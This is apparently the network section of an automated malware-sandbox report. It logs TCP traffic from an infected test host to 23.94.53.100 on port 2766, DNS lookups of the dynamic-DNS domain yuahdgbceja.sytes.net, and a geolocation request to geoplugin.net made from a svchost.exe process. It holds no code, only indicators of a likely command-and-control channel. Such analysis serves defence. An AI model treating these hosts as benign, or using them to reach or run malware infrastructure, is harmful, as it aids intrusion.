              May 2, 2024 15:09:59.310461044 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310503006 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.310539961 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310703039 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310749054 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.310798883 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310897112 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310952902 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.310972929 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.312995911 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313050032 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.313354969 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313446045 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313499928 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313519001 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.313628912 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313683987 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.313724041 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313898087 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313954115 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.314074039 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.314153910 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.314207077 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.314227104 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.314302921 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.314321995 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.314347029 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.314378023 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.314414978 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.315556049 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.315623999 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.315665007 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.315679073 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.315742016 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.315787077 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.315962076 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316196918 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316243887 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.316256046 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316312075 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316366911 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316376925 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.316487074 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316556931 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.316572905 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316633940 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316673994 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316693068 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.318532944 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.318625927 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.318635941 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.318694115 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.318747997 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.318773985 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.318875074 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.318917990 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.318944931 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319016933 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319056034 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.319097042 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319133043 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319179058 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.319199085 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319303036 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319344997 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.319405079 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319494009 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319549084 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.322479010 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322551966 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322616100 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322634935 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.322676897 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322731972 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.322747946 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322788954 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322835922 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322840929 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.358704090 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.358777046 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.358856916 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.405283928 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.409588099 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409611940 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409674883 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.409684896 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409722090 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409780979 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.409789085 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409825087 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409883976 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.409887075 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409946918 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410018921 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410023928 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410130024 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410176992 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410204887 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410355091 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410398006 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410434008 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410445929 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410491943 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410501003 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410562992 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410602093 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410619020 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410660982 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410715103 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410728931 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410787106 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410844088 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410860062 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410861015 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410916090 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410921097 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410984039 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411027908 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411037922 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411076069 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411125898 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411140919 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411272049 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411310911 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411324024 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411369085 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411420107 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411451101 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411581039 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411626101 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411647081 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411705017 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411752939 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411760092 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411813021 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411871910 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411890030 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411928892 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411978006 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411984921 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.412026882 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.412080050 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.412089109 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.412158012 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.412203074 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.978053093 CEST8049709178.237.33.50192.168.2.6
              May 2, 2024 15:09:59.982393980 CEST4970980192.168.2.6178.237.33.50
              May 2, 2024 15:10:04.413955927 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:04.467639923 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:04.898091078 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:04.952138901 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:05.500241995 CEST27664970723.94.53.100192.168.2.6
              May 2, 2024 15:10:05.545789957 CEST497072766192.168.2.623.94.53.100
              May 2, 2024 15:10:05.667411089 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:05.733278990 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:06.955909967 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:06.961618900 CEST497072766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.054976940 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067209959 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067277908 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.067281961 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067321062 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.067384005 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067399979 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067435980 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.067488909 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067563057 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067608118 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.067627907 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067683935 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067718983 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.067785978 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067869902 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067905903 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.067965031 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068022966 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068067074 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068085909 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068151951 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068186998 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068259001 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068345070 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068386078 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068408966 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068448067 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068480015 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068516016 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068537951 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068572044 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068614960 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068646908 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068690062 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068720102 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068783045 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068818092 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068833113 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068890095 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068924904 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068967104 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069000006 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069031954 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069056988 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069116116 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069152117 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069195032 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069241047 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069272995 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069312096 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069386005 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069420099 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069444895 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069546938 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069582939 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069677114 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069751978 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069786072 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069794893 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069837093 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069885015 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069900036 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069952965 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069988012 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070012093 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070051908 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070086002 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070127964 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070198059 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070233107 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070240974 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070307970 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070343018 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070343018 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070390940 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070427895 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070502043 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070602894 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070635080 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070652962 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070707083 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070740938 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070785046 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070873976 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070909023 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070977926 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071053982 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071089983 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.071146011 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071196079 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071230888 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.071254969 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071343899 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071365118 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071381092 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.071451902 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071484089 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.071669102 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072139978 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072175026 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.072247982 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072721004 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072757959 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.072803974 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072851896 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072885990 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.072910070 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072964907 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072997093 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.073036909 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073060989 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073092937 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.073112965 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073498964 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073534012 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.073575974 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073620081 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073657036 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.073715925 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073769093 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073802948 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.073822021 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073877096 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073911905 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.073920012 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073971033 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074004889 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.074172020 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074244022 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074279070 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.074285984 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074350119 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074389935 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.074417114 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074461937 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074501038 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.074567080 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074625015 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074644089 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074661970 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.123909950 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.130009890 CEST27664970723.94.53.100192.168.2.6
              May 2, 2024 15:10:14.159898996 CEST497072766192.168.2.623.94.53.100
              May 2, 2024 15:10:14.159979105 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:14.171282053 CEST4970980192.168.2.6178.237.33.50
              May 2, 2024 15:10:16.024542093 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:16.134370089 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:16.137749910 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:17.323556900 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:17.438484907 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:17.483313084 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:17.593044043 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:17.623439074 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:17.787003040 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:17.787070036 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:17.958954096 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:18.054697037 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:18.100419044 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:18.211184025 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:18.269450903 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:18.460237980 CEST4971780192.168.2.6178.237.33.50
              May 2, 2024 15:10:18.624003887 CEST8049717178.237.33.50192.168.2.6
              May 2, 2024 15:10:18.624151945 CEST4971780192.168.2.6178.237.33.50
              May 2, 2024 15:10:18.624363899 CEST4971780192.168.2.6178.237.33.50
              May 2, 2024 15:10:18.792819023 CEST8049717178.237.33.50192.168.2.6
              May 2, 2024 15:10:18.792921066 CEST4971780192.168.2.6178.237.33.50
              May 2, 2024 15:10:18.809041023 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:18.974522114 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:19.792700052 CEST8049717178.237.33.50192.168.2.6
              May 2, 2024 15:10:19.792953968 CEST4971780192.168.2.6178.237.33.50
              May 2, 2024 15:10:35.529891968 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:35.533654928 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:35.693332911 CEST27664971623.94.53.100192.168.2.6

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              May 2, 2024 15:09:56.903291941 CEST6459253192.168.2.61.1.1.1
              May 2, 2024 15:09:56.994733095 CEST53645921.1.1.1192.168.2.6
              May 2, 2024 15:09:58.545958042 CEST4996053192.168.2.61.1.1.1
              May 2, 2024 15:09:58.636861086 CEST53499601.1.1.1192.168.2.6

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              May 2, 2024 15:09:56.903291941 CEST192.168.2.61.1.1.10xff1bStandard query (0)yuahdgbceja.sytes.netA (IP address)IN (0x0001)false
              May 2, 2024 15:09:58.545958042 CEST192.168.2.61.1.1.10x3415Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              May 2, 2024 15:09:56.994733095 CEST1.1.1.1192.168.2.60xff1bNo error (0)yuahdgbceja.sytes.net23.94.53.100A (IP address)IN (0x0001)false
              May 2, 2024 15:09:58.636861086 CEST1.1.1.1192.168.2.60x3415No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • geoplugin.net

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.649709178.237.33.50802248C:\Windows\SysWOW64\svchost.exe
              TimestampBytes transferredDirectionData
              May 2, 2024 15:09:58.805686951 CEST71OUTGET /json.gp HTTP/1.1
              Host: geoplugin.net
              Cache-Control: no-cache
              May 2, 2024 15:09:58.976731062 CEST1173INHTTP/1.1 200 OK
              date: Thu, 02 May 2024 13:09:58 GMT
              server: Apache
              content-length: 965
              content-type: application/json; charset=utf-8
              cache-control: public, max-age=300
              access-control-allow-origin: *
              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 33 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
